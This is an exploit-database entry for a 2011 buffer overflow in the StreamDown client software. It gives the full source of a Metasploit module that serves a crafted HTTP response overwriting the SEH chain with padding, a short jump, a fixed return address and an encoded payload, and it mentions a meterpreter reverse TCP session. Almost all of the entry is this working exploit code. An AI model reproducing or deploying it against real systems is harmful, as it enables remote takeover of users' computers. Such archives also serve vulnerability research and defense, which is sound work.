header-logo
Suggest Exploit
vendor:
StreamDown
by:
Fady Mohamed Osman
N/A
CVSS
N/A
Buffer Overflow
119
CWE
Product Name: StreamDown
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2011

StreamDown Buffer over flow universal exploit

This is a universal exploit for the StreamDown software that exploits a buffer overflow vulnerability. It has been tested against Windows XP SP3 and Windows 7 SP1. It should be noted that the program will not crash in case of a meterpreter reverse TCP payload, but a session will be opened.

Mitigation:

Apply the latest patches and updates for StreamDown.
Source

Exploit-DB raw data:

##
# $Id: stream_down_BOF.rb 1 2011-12-18 $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking
	include Msf::Exploit::Remote::HttpServer
	
	def initialize
			super(
					'Name'           => 'StreamDown Buffer over flow universal exploit',
					'Version'        => '$Revision: 1 $',
					'Description'    => 'Stream Down Buffer Overflow universal exploit tested against win xp sp3 and win7 sp1. Also note that the program will not crash in case of meterpreter reverse tcp payload but a session will be opened',
					'Author'         => 'Fady Mohamed Osman',
					'References'	 => 
						[
								['URL', 'http://www.dark-masters.tk/']
						],
					'Privileged'     => false,
					'DefaultOptions' =>
						{
							'EXITFUNC' => 'seh',
							'InitialAutoRunScript' => 'migrate -f'
						},
					'Payload'        =>
						{
							'BadChars' => "\x00\xff\x0a"
						},
					'Platform'       => 'win',
					'Targets'        =>
						[
							[ 'Automatic',  { } ],
						],
					'DefaultTarget' => 0,
					'License'        => MSF_LICENSE
                )
	end
	def on_request_uri(cli,request)
		seh = 0x10019448
		nseh = "\xeb\x06\x90\x90"
		sploit = "A"*16388 + nseh + [seh].pack('V') + "\x90"*10 + payload.encoded 
		cli.put(sploit)
		close_client(cli)
	end
end